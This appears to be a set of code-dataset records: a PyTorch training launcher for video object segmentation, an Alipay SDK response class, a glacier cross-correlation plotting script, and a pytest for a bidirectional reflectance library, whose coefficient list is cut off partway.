"BSD-3-Clause"
] | 14 | 2021-11-18T09:52:36.000Z | 2022-03-31T16:26:32.000Z | tools/train.py | lingyunwu14/aot-benchmark | 99f74f051c91ac221e44f3edab3534ae4dd233f7 | [
"BSD-3-Clause"
] | 17 | 2021-11-16T13:28:29.000Z | 2022-03-29T02:14:48.000Z | import importlib
import random
import sys
sys.setrecursionlimit(10000)
sys.path.append('.')
sys.path.append('..')
import torch.multiprocessing as mp
from networks.managers.trainer import Trainer
def main_worker(gpu, cfg, enable_amp=True):
# Initiate a training manager
trainer = Trainer(rank=gpu, cfg=cfg, enable_amp=enable_amp)
# Start Training
trainer.sequential_training()
def main():
import argparse
parser = argparse.ArgumentParser(description="Train VOS")
parser.add_argument('--exp_name', type=str, default='')
parser.add_argument('--stage', type=str, default='pre')
parser.add_argument('--model', type=str, default='aott')
parser.add_argument('--start_gpu', type=int, default=0)
parser.add_argument('--gpu_num', type=int, default=-1)
parser.add_argument('--batch_size', type=int, default=-1)
parser.add_argument('--dist_url', type=str, default='')
parser.add_argument('--amp', action='store_true')
parser.set_defaults(amp=False)
parser.add_argument('--pretrained_path', type=str, default='')
parser.add_argument('--datasets', nargs='+', type=str, default=[])
parser.add_argument('--lr', type=float, default=-1.)
parser.add_argument('--total_step', type=int, default=-1.)
parser.add_argument('--start_step', type=int, default=-1.)
args = parser.parse_args()
engine_config = importlib.import_module('configs.' + args.stage)
cfg = engine_config.EngineConfig(args.exp_name, args.model)
if len(args.datasets) > 0:
cfg.DATASETS = args.datasets
cfg.DIST_START_GPU = args.start_gpu
if args.gpu_num > 0:
cfg.TRAIN_GPUS = args.gpu_num
if args.batch_size > 0:
cfg.TRAIN_BATCH_SIZE = args.batch_size
if args.pretrained_path != '':
cfg.PRETRAIN_MODEL = args.pretrained_path
if args.lr > 0:
cfg.TRAIN_LR = args.lr
if args.total_step > 0:
cfg.TRAIN_TOTAL_STEPS = args.total_step
if args.start_step > 0:
cfg.TRAIN_START_STEP = args.start_step
if args.dist_url == '':
cfg.DIST_URL = 'tcp://127.0.0.1:123' + str(random.randint(0, 9)) + str(
random.randint(0, 9))
else:
cfg.DIST_URL = args.dist_url
# Use torch.multiprocessing.spawn to launch distributed processes
mp.spawn(main_worker, nprocs=cfg.TRAIN_GPUS, args=(cfg, args.amp))
if __name__ == '__main__':
main()
| 30.0625 | 79 | 0.675676 | import importlib
import random
import sys
sys.setrecursionlimit(10000)
sys.path.append('.')
sys.path.append('..')
import torch.multiprocessing as mp
from networks.managers.trainer import Trainer
def main_worker(gpu, cfg, enable_amp=True):
trainer = Trainer(rank=gpu, cfg=cfg, enable_amp=enable_amp)
trainer.sequential_training()
def main():
import argparse
parser = argparse.ArgumentParser(description="Train VOS")
parser.add_argument('--exp_name', type=str, default='')
parser.add_argument('--stage', type=str, default='pre')
parser.add_argument('--model', type=str, default='aott')
parser.add_argument('--start_gpu', type=int, default=0)
parser.add_argument('--gpu_num', type=int, default=-1)
parser.add_argument('--batch_size', type=int, default=-1)
parser.add_argument('--dist_url', type=str, default='')
parser.add_argument('--amp', action='store_true')
parser.set_defaults(amp=False)
parser.add_argument('--pretrained_path', type=str, default='')
parser.add_argument('--datasets', nargs='+', type=str, default=[])
parser.add_argument('--lr', type=float, default=-1.)
parser.add_argument('--total_step', type=int, default=-1.)
parser.add_argument('--start_step', type=int, default=-1.)
args = parser.parse_args()
engine_config = importlib.import_module('configs.' + args.stage)
cfg = engine_config.EngineConfig(args.exp_name, args.model)
if len(args.datasets) > 0:
cfg.DATASETS = args.datasets
cfg.DIST_START_GPU = args.start_gpu
if args.gpu_num > 0:
cfg.TRAIN_GPUS = args.gpu_num
if args.batch_size > 0:
cfg.TRAIN_BATCH_SIZE = args.batch_size
if args.pretrained_path != '':
cfg.PRETRAIN_MODEL = args.pretrained_path
if args.lr > 0:
cfg.TRAIN_LR = args.lr
if args.total_step > 0:
cfg.TRAIN_TOTAL_STEPS = args.total_step
if args.start_step > 0:
cfg.TRAIN_START_STEP = args.start_step
if args.dist_url == '':
cfg.DIST_URL = 'tcp://127.0.0.1:123' + str(random.randint(0, 9)) + str(
random.randint(0, 9))
else:
cfg.DIST_URL = args.dist_url
mp.spawn(main_worker, nprocs=cfg.TRAIN_GPUS, args=(cfg, args.amp))
if __name__ == '__main__':
main()
| true | true |
f72eea59e503d70ee01dac7d729bac23d7d76c56 | 1,283 | py | Python | alipay/aop/api/response/AlipayInsUnderwriteUserPolicyQueryResponse.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/response/AlipayInsUnderwriteUserPolicyQueryResponse.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/response/AlipayInsUnderwriteUserPolicyQueryResponse.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.InsPolicy import InsPolicy
class AlipayInsUnderwriteUserPolicyQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayInsUnderwriteUserPolicyQueryResponse, self).__init__()
self._policys = None
self._total = None
@property
def policys(self):
return self._policys
@policys.setter
def policys(self, value):
if isinstance(value, list):
self._policys = list()
for i in value:
if isinstance(i, InsPolicy):
self._policys.append(i)
else:
self._policys.append(InsPolicy.from_alipay_dict(i))
@property
def total(self):
return self._total
@total.setter
def total(self, value):
self._total = value
def parse_response_content(self, response_content):
response = super(AlipayInsUnderwriteUserPolicyQueryResponse, self).parse_response_content(response_content)
if 'policys' in response:
self.policys = response['policys']
if 'total' in response:
self.total = response['total']
| 29.837209 | 115 | 0.646921 |
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.InsPolicy import InsPolicy
class AlipayInsUnderwriteUserPolicyQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayInsUnderwriteUserPolicyQueryResponse, self).__init__()
self._policys = None
self._total = None
@property
def policys(self):
return self._policys
@policys.setter
def policys(self, value):
if isinstance(value, list):
self._policys = list()
for i in value:
if isinstance(i, InsPolicy):
self._policys.append(i)
else:
self._policys.append(InsPolicy.from_alipay_dict(i))
@property
def total(self):
return self._total
@total.setter
def total(self, value):
self._total = value
def parse_response_content(self, response_content):
response = super(AlipayInsUnderwriteUserPolicyQueryResponse, self).parse_response_content(response_content)
if 'policys' in response:
self.policys = response['policys']
if 'total' in response:
self.total = response['total']
| true | true |
f72eead581d421c3d44843fa5cbdc580e431a508 | 9,270 | py | Python | Manuscript-figures/xcorr_lag_composite.py | ehultee/helheim-fiesta | ed4e3f4ceac58137c1a4066941783a5c38d29c9b | [
"MIT"
] | null | null | null | Manuscript-figures/xcorr_lag_composite.py | ehultee/helheim-fiesta | ed4e3f4ceac58137c1a4066941783a5c38d29c9b | [
"MIT"
] | null | null | null | Manuscript-figures/xcorr_lag_composite.py | ehultee/helheim-fiesta | ed4e3f4ceac58137c1a4066941783a5c38d29c9b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Six-panel xcorr *and* lag
Created on Thu Feb 4 18:21:08 2021
@author: lizz
"""
div_colors = 'RdBu' # choose divergent colormap for xcorr
# lag_colors = 'PiYG' # choose divergent colormap for lag
corrnorm_min, corrnorm_max = -0.3, 0.3
# lagnorm_min, lagnorm_max = -365, 365
lag_colors = 'Greens'
lagnorm_min, lagnorm_max = 0, 365
## set matplotlib font size defaults
SMALL_SIZE = 10
MEDIUM_SIZE = 12
BIGGER_SIZE = 14
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
sig_markers = ['o', 'x']
## black-white hillshade topo underneath
rgb2 = ls.shade(np.asarray(b_hel), cmap=plt.get_cmap('gray'), blend_mode='overlay',
dx=np.mean(np.diff(x_hel)), dy=np.mean(np.diff(y_hel)), vert_exag=5.)
fig, ((ax1, ax2, ax3), (ax4,ax5,ax6)) = plt.subplots(nrows=2,ncols=3, figsize=(12, 8),
# constrained_layout=True,
sharex=True, sharey=True,
gridspec_kw={'wspace':0.01})
ax1.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc1 = ax1.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
c=np.asarray(smb_corr_amax)[smb_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax1.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
c=np.asarray(smb_corr_amax)[np.invert(smb_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max) #different marker for insig values
# sc1 = ax1.scatter(np.asarray(xys)[:,0], np.asarray(xys)[:,1], c=smb_corr_amax, cmap=div_colors,
# vmin=corrnorm_min, vmax=corrnorm_max)
# ## set up correctly scaled colorbar
# div1 = make_axes_locatable(ax1)
# cax1 = div1.append_axes("right", size="5%", pad=0.1)
# plt.colorbar(sc1, cax=cax1)
# cb1.ax.set_title('AMax. xcorr')
ax1.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
ylabel='Northing [km]', title='Catchment SMB')
ax2.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc2 = ax2.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
c=np.asarray(runoff_corr_amax)[runoff_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax2.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
c=np.asarray(runoff_corr_amax)[np.invert(runoff_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max) # distinguish insig values
# sc2 = ax2.scatter(np.asarray(xys)[:,0], np.asarray(xys)[:,1], c=runoff_corr_amax, cmap=div_colors,
# vmin=corrnorm_min, vmax=corrnorm_max)
# ## set up correctly scaled colorbar
# div2 = make_axes_locatable(ax2)
# cax2 = div2.append_axes("right", size="5%", pad=0.1)
# fig.colorbar(sc2, cax=cax2)
# cb2.ax.set_title('AMax. xcorr')
ax2.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
title='Catchment runoff')
ax3.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc3 = ax3.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
c=np.asarray(terminus_corr_amax)[terminus_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax3.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
c=np.asarray(terminus_corr_amax)[np.invert(terminus_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
# sc3 = ax3.scatter(np.asarray(xys)[:,0], np.asarray(xys)[:,1], c=terminus_corr_amax, cmap=div_colors,
# vmin=corrnorm_min, vmax=corrnorm_max)
## set up correctly scaled colorbar - one for all xcorr plots
div3 = make_axes_locatable(ax3)
cax3 = div3.append_axes("right", size="5%", pad=0.1)
cb3 = fig.colorbar(sc3, cax=cax3)
cb3.ax.set_ylabel('AMax. xcorr')
ax3.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
title='Terminus position', aspect=1.)
## SECOND ROW
ax4.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc4 = ax4.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
c=np.asarray(smb_lag_amax)[smb_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax4.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
c=np.asarray(smb_lag_amax)[np.invert(smb_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
# sc4 = ax4.scatter(np.asarray(xys)[:,0], np.asarray(xys)[:,1], c=smb_lag_amax, cmap=lag_colors,
# vmin=lagnorm_min, vmax=lagnorm_max)
# ## set up correctly scaled colorbar
# div4 = make_axes_locatable(ax4)
# cax4 = div4.append_axes("right", size="5%", pad=0.1)
# plt.colorbar(sc4, cax=cax4)
# cb1.ax.set_title('Lag [d] at peak xcorr')
ax4.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]', ylabel='Northing [km]')
ax5.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc5 = ax5.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
c=np.asarray(runoff_lag_amax)[runoff_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax5.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
c=np.asarray(runoff_lag_amax)[np.invert(runoff_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
# sc5 = ax5.scatter(np.asarray(xys)[:,0], np.asarray(xys)[:,1], c=runoff_lag_amax, cmap=lag_colors,
# vmin=lagnorm_min, vmax=lagnorm_max)
# ## set up correctly scaled colorbar
# div5 = make_axes_locatable(ax5)
# cax5 = div5.append_axes("right", size="5%", pad=0.1)
# fig.colorbar(sc5, cax=cax5)
# cb2.ax.set_title('Lag [d] at peak xcorr')
ax5.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]')
ax6.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc6 = ax6.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
c=np.asarray(terminus_lag_amax)[terminus_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax6.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
c=np.asarray(terminus_lag_amax)[np.invert(terminus_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
# sc6 = ax6.scatter(np.asarray(xys)[:,0], np.asarray(xys)[:,1], c=terminus_lag_amax, cmap=lag_colors,
# vmin=lagnorm_min, vmax=lagnorm_max)
## set up correctly scaled colorbar
div6 = make_axes_locatable(ax6)
cax6 = div6.append_axes("right", size="5%", pad=0.1)
cb6 = fig.colorbar(sc6, cax=cax6)
cb6.ax.set_ylabel('Lag [d] at peak xcorr')
cb6.set_ticks([0, 60, 120, 180, 240, 300, 360])
ax6.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]', aspect=1.)
# plt.tight_layout()
# plt.show()
# plt.savefig('/Users/lizz/Desktop/20210204-helheim-xcorr_lag_composite') | 58.670886 | 119 | 0.66548 |
div_colors = 'RdBu'
0.3
lag_colors = 'Greens'
lagnorm_min, lagnorm_max = 0, 365
IGGER_SIZE = 14
plt.rc('font', size=SMALL_SIZE)
plt.rc('axes', titlesize=BIGGER_SIZE)
plt.rc('axes', labelsize=MEDIUM_SIZE)
plt.rc('xtick', labelsize=SMALL_SIZE)
plt.rc('ytick', labelsize=SMALL_SIZE)
plt.rc('legend', fontsize=SMALL_SIZE)
plt.rc('figure', titlesize=BIGGER_SIZE)
sig_markers = ['o', 'x']
p=plt.get_cmap('gray'), blend_mode='overlay',
dx=np.mean(np.diff(x_hel)), dy=np.mean(np.diff(y_hel)), vert_exag=5.)
fig, ((ax1, ax2, ax3), (ax4,ax5,ax6)) = plt.subplots(nrows=2,ncols=3, figsize=(12, 8),
sharex=True, sharey=True,
gridspec_kw={'wspace':0.01})
ax1.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc1 = ax1.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
c=np.asarray(smb_corr_amax)[smb_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax1.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
c=np.asarray(smb_corr_amax)[np.invert(smb_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
ylabel='Northing [km]', title='Catchment SMB')
ax2.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc2 = ax2.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
c=np.asarray(runoff_corr_amax)[runoff_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax2.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
c=np.asarray(runoff_corr_amax)[np.invert(runoff_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
title='Catchment runoff')
ax3.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc3 = ax3.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
c=np.asarray(terminus_corr_amax)[terminus_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax3.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
c=np.asarray(terminus_corr_amax)[np.invert(terminus_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
ght", size="5%", pad=0.1)
cb3 = fig.colorbar(sc3, cax=cax3)
cb3.ax.set_ylabel('AMax. xcorr')
ax3.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
title='Terminus position', aspect=1.)
rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc4 = ax4.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
c=np.asarray(smb_lag_amax)[smb_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax4.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
c=np.asarray(smb_lag_amax)[np.invert(smb_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]', ylabel='Northing [km]')
ax5.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc5 = ax5.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
c=np.asarray(runoff_lag_amax)[runoff_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax5.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
c=np.asarray(runoff_lag_amax)[np.invert(runoff_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]')
ax6.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc6 = ax6.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
c=np.asarray(terminus_lag_amax)[terminus_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax6.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
c=np.asarray(terminus_lag_amax)[np.invert(terminus_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
ax6 = div6.append_axes("right", size="5%", pad=0.1)
cb6 = fig.colorbar(sc6, cax=cax6)
cb6.ax.set_ylabel('Lag [d] at peak xcorr')
cb6.set_ticks([0, 60, 120, 180, 240, 300, 360])
ax6.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]', aspect=1.)
| true | true |
f72eeb8fcef6921a2eaeb55802122ae8eb9fcfcd | 159,724 | py | Python | tests/test_mishchenko_refllib.py | ghislainp/mishchenko_brf | de7fe70730b53f17fb7e7aa9a45f08bf7d97abd1 | [
"MIT"
] | 2 | 2021-12-19T17:43:48.000Z | 2022-01-30T21:08:54.000Z | tests/test_mishchenko_refllib.py | ghislainp/mishchenko_brf | de7fe70730b53f17fb7e7aa9a45f08bf7d97abd1 | [
"MIT"
] | null | null | null | tests/test_mishchenko_refllib.py | ghislainp/mishchenko_brf | de7fe70730b53f17fb7e7aa9a45f08bf7d97abd1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Tests for `mishchenko_brf` package."""
import numpy as np
from mishchenko_brf.lib.refl import brf
def test_brf():
"""Sample pytest test function with the pytest fixture as an argument."""
# from bs4 import BeautifulSoup
# assert 'GitHub' in BeautifulSoup(response.content).title.string
ssalb, _, legendre = setup()
_, spherical_albedo, albedo, _, r = brf(ssalb, len(legendre), legendre)
exptected_spherical_albedo, expected_albedo, expected_r1 = results()
np.testing.assert_allclose(albedo, expected_albedo, atol=1e-6, rtol=0)
r1 = np.concatenate([r[1, i, : i + 1] for i in range(r.shape[1])])
np.testing.assert_allclose(r1, expected_r1, atol=1e-5, rtol=0)
def setup():
ssalb = 0.85404045e00
# 642
Legendre_coef = [
0.1000000e01,
0.2512562e01,
0.3759305e01,
0.4408389e01,
0.5536463e01,
0.6260982e01,
0.7525636e01,
0.8312788e01,
0.9542491e01,
0.1040885e02,
0.1151645e02,
0.1244280e02,
0.1343854e02,
0.1442002e02,
0.1533074e02,
0.1628946e02,
0.1717182e02,
0.1807816e02,
0.1898665e02,
0.1978204e02,
0.2073036e02,
0.2142049e02,
0.2241713e02,
0.2301598e02,
0.2401247e02,
0.2456069e02,
0.2552589e02,
0.2607232e02,
0.2695832e02,
0.2752722e02,
0.2831653e02,
0.2892665e02,
0.2962000e02,
0.3025463e02,
0.3086891e02,
0.3150598e02,
0.3207453e02,
0.3268248e02,
0.3323146e02,
0.3378450e02,
0.3433640e02,
0.3482245e02,
0.3538333e02,
0.3580127e02,
0.3636525e02,
0.3672771e02,
0.3728034e02,
0.3760455e02,
0.3812729e02,
0.3843143e02,
0.3890899e02,
0.3920687e02,
0.3962926e02,
0.3992750e02,
0.4029233e02,
0.4059085e02,
0.4090206e02,
0.4119521e02,
0.4146075e02,
0.4174035e02,
0.4196960e02,
0.4222747e02,
0.4242858e02,
0.4265858e02,
0.4283710e02,
0.4303618e02,
0.4319451e02,
0.4336267e02,
0.4350045e02,
0.4364008e02,
0.4375514e02,
0.4386992e02,
0.4395939e02,
0.4405318e02,
0.4411450e02,
0.4419058e02,
0.4422209e02,
0.4428264e02,
0.4428387e02,
0.4432995e02,
0.4430155e02,
0.4433324e02,
0.4427669e02,
0.4429349e02,
0.4421068e02,
0.4421187e02,
0.4410481e02,
0.4408970e02,
0.4396023e02,
0.4392847e02,
0.4377812e02,
0.4372965e02,
0.4355963e02,
0.4349478e02,
0.4330600e02,
0.4322534e02,
0.4301853e02,
0.4292279e02,
0.4269857e02,
0.4258853e02,
0.4234756e02,
0.4222396e02,
0.4196694e02,
0.4183048e02,
0.4155822e02,
0.4140946e02,
0.4112286e02,
0.4096230e02,
0.4066235e02,
0.4049042e02,
0.4017813e02,
0.3999523e02,
0.3967166e02,
0.3947818e02,
0.3914435e02,
0.3894071e02,
0.3859761e02,
0.3838426e02,
0.3803282e02,
0.3781024e02,
0.3745135e02,
0.3722008e02,
0.3685457e02,
0.3661513e02,
0.3624382e02,
0.3599677e02,
0.3562045e02,
0.3536629e02,
0.3498576e02,
0.3472502e02,
0.3434105e02,
0.3407421e02,
0.3368756e02,
0.3341511e02,
0.3302651e02,
0.3274894e02,
0.3235911e02,
0.3207689e02,
0.3168649e02,
0.3140011e02,
0.3100977e02,
0.3071973e02,
0.3033004e02,
0.3003681e02,
0.2964833e02,
0.2935240e02,
0.2896567e02,
0.2866749e02,
0.2828303e02,
0.2798304e02,
0.2760134e02,
0.2729996e02,
0.2692148e02,
0.2661913e02,
0.2624432e02,
0.2594138e02,
0.2557065e02,
0.2526752e02,
0.2490123e02,
0.2459831e02,
0.2423680e02,
0.2393445e02,
0.2357803e02,
0.2327663e02,
0.2292556e02,
0.2262546e02,
0.2228000e02,
0.2198153e02,
0.2164193e02,
0.2134540e02,
0.2101185e02,
0.2071756e02,
0.2039027e02,
0.2009849e02,
0.1977763e02,
0.1948862e02,
0.1917433e02,
0.1888834e02,
0.1858075e02,
0.1829802e02,
0.1799722e02,
0.1771798e02,
0.1742405e02,
0.1714851e02,
0.1686151e02,
0.1658986e02,
0.1630983e02,
0.1604226e02,
0.1576923e02,
0.1550590e02,
0.1523988e02,
0.1498093e02,
0.1472193e02,
0.1446749e02,
0.1421550e02,
0.1396569e02,
0.1372068e02,
0.1347561e02,
0.1323754e02,
0.1299730e02,
0.1276613e02,
0.1253080e02,
0.1230645e02,
0.1207611e02,
0.1185852e02,
0.1163322e02,
0.1142231e02,
0.1120210e02,
0.1099778e02,
0.1078270e02,
0.1058487e02,
0.1037494e02,
0.1018351e02,
0.9978738e01,
0.9793600e01,
0.9593997e01,
0.9415044e01,
0.9220600e01,
0.9047715e01,
0.8858418e01,
0.8691482e01,
0.8507312e01,
0.8346198e01,
0.8167129e01,
0.8011710e01,
0.7837708e01,
0.7687854e01,
0.7518876e01,
0.7374456e01,
0.7210453e01,
0.7071336e01,
0.6912254e01,
0.6778307e01,
0.6624084e01,
0.6495174e01,
0.6345745e01,
0.6221738e01,
0.6077033e01,
0.5957794e01,
0.5817740e01,
0.5703134e01,
0.5567654e01,
0.5457548e01,
0.5326563e01,
0.5220821e01,
0.5094248e01,
0.4992739e01,
0.4870492e01,
0.4773085e01,
0.4655075e01,
0.4561642e01,
0.4447778e01,
0.4358190e01,
0.4248381e01,
0.4162514e01,
0.4056666e01,
0.3974395e01,
0.3872413e01,
0.3793618e01,
0.3695406e01,
0.3619966e01,
0.3525429e01,
0.3453228e01,
0.3362271e01,
0.3293193e01,
0.3205718e01,
0.3139651e01,
0.3055564e01,
0.2992397e01,
0.2911601e01,
0.2851228e01,
0.2773628e01,
0.2715944e01,
0.2641446e01,
0.2586348e01,
0.2514857e01,
0.2462248e01,
0.2393671e01,
0.2343453e01,
0.2277698e01,
0.2229778e01,
0.2166754e01,
0.2121041e01,
0.2060659e01,
0.2017065e01,
0.1959237e01,
0.1917674e01,
0.1862314e01,
0.1822700e01,
0.1769722e01,
0.1731977e01,
0.1681298e01,
0.1645344e01,
0.1596882e01,
0.1562643e01,
0.1516319e01,
0.1483723e01,
0.1439458e01,
0.1408435e01,
0.1366152e01,
0.1336633e01,
0.1296260e01,
0.1268180e01,
0.1229642e01,
0.1202937e01,
0.1166165e01,
0.1140775e01,
0.1105699e01,
0.1081566e01,
0.1048119e01,
0.1025186e01,
0.9933033e00,
0.9715168e00,
0.9411347e00,
